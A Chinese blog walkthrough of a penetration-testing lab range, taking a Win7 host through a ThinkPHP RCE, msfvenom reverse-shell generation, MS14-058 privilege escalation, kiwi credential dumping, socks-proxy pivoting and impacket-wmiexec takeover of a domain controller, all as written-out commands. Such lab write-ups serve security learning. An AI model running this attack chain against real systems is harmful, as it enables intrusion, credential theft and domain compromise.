无境红日靶场五 wp

本专栏是笔者的网络安全学习笔记,一面分享,同时作为笔记

文章目录

前文链接

  1. WAMP/DVWA/sqli-labs 搭建
  2. burpsuite工具抓包及Intruder暴力破解的使用
  3. 目录扫描,请求重发,漏洞扫描等工具的使用
  4. 网站信息收集及nmap的下载使用
  5. SQL注入(1)------了解成因和手工注入方法
  6. SQL注入(2)------各种注入
  7. SQL注入(3)------SQLMAP
  8. SQL注入(4)------实战SQL注入拿webshell
  9. Vulnhub靶机渗透之Me and My Girlfriend
  10. XSS漏洞
  11. 文件上传漏洞
  12. 文件上传绕过
  13. 文件包含漏洞
  14. Vulnhub靶机渗透之zico2
  15. 命令执行漏洞
  16. 逻辑漏洞(越权访问和支付漏洞)
  17. 网站后台安全
  18. weevely的使用及免杀(Linux中的菜刀)
  19. MSF(1)------一次完整的渗透流程
  20. WebShell命令执行限制(解决方案)
  21. 记一次艰难的SQL注入(过安全狗)
  22. MSF(2)------各种木马的生成及简单的免杀
  23. MSF(3)------apk和exe的加马(过360、火绒)
  24. 通过Frp解决实现内网穿透
  25. 改造冰蝎马,实现免杀之default_aes php
  26. 记一次简单的对盗号网站的渗透
  27. 记一次幸运的漏洞挖掘
  28. 内网渗透初探
  29. 记对外国某服务器的内网渗透
  30. 一次丝滑的内网渗透拿下域控
  31. 实战内网PTH上线域控
  32. 通过路由器进行内网渗透
  33. 钓鱼邮件和钓鱼样本
  34. 无境vulntarget-a wp
  35. 无境ZeroLogon 练习 wp
  36. 无境三层综合渗透 wp

一层Win7

WebShell

目标IP:192.168.111.150,用nmap快速扫全端口

bash 复制代码
nmap -p- -T4 --min-rate 2000 -n -Pn 192.168.111.150

重点是80端口的web服务,打开发现是一个Thinkphp

使用利用工具测试,存在ThinkPHP 5.0.22/5.1.29 RCE

用工具一键getshell

Administrator权限的Win7,明显在域中

Msf

用reverse_tcp生成shellcode

bash 复制代码
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.111.25 lport=6666 -f exe > 1.exe

msfconsole这样子配置

bash 复制代码
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 6666
run

把生成的1.exe放到服务器上运行,成功获取到meterpreter

提权

systeminfo看补丁信息

我靠这么多

考虑使用MS14-058进行提权

bash 复制代码
use exploit/windows/local/ms14_058_track_popup_menu
set payload windows/x64/meterpreter/reverse_tcp
set SESSION 1
set LHOST 192.168.111.25
set target 1
run

成功得到SYSTEM的meterpreter

抓密码

bash 复制代码
load kiwi
bash 复制代码
creds_all

666演都不演了,得到密码为dc123.com

横向

systeminfo查到当前域为sun.com

用meterpreter直接查域控

bash 复制代码
run post/windows/gather/enum_domain

得到域控IP为192.168.138.138

二层域控

一级代理

用autoroute建立一级代理,走192.168.138.0/24

bash 复制代码
run post/multi/manage/autoroute

然后创建socks5代理

bash 复制代码
use auxiliary/server/socks_proxy
run

用proxychain来配置代理,在/etc/proxychain4.conf最后一行加上

bash 复制代码
socks5	127.0.0.1 1080

可以用nc测试代理是否建立成功

bash 复制代码
proxychains nc -zv 192.168.138.138 445

能连通即为成功

wmiexec

直接用psexec横向getshell

bash 复制代码
proxychains impacket-wmiexec SUN/Administrator:'dc123.com'@192.168.138.138

好简单的靶场

相关推荐
草莓熊Lotso12 小时前
【Redis 初阶】Set 类型深度解析:去重集合的运算能力与实战场景
linux·网络·数据库·windows·redis·tcp/ip·缓存
XR12345678813 小时前
汽车制造园区网络怎么建?柔性产线与 AGV 的选型逻辑
网络·汽车·制造
蒲公英eric21 小时前
从客户端到服务端:DVWA DOM 型 XSS 模块完整漏洞分析教程
前端·web安全·ai·xss·dvwa·ai安全
yunlong32671 天前
吊车选型与载荷计算:避开4个坑,安全吊装不再难
安全·方案·事故·吊装·起重·吊装重量·吊装半径
IT大白鼠1 天前
MSF二次开发与自定义模块编写
网络·安全·web安全·msf
Flynt1 天前
1200个AI Agent自己组了个群,把Hugging Face黑了
安全·openai·agent
Julien20041 天前
调查和解决 SELinux 问题
linux·运维·服务器·网络·学习方法
kekekzt1 天前
TCP协议的粘包问题介绍,IP分片,MTU,MSS,滑动窗口的概念及之间的关系
网络·网络协议·tcp/ip
mooooooooooye1 天前
2026 年跨平台 SSH 客户端怎么选?Xterminal、Termius、MobaXterm 谁更合适
服务器·网络·ssh
Blockchina1 天前
Codex 实战:从一句需求到可验收的 Linux 主机巡检脚本
运维·服务器·网络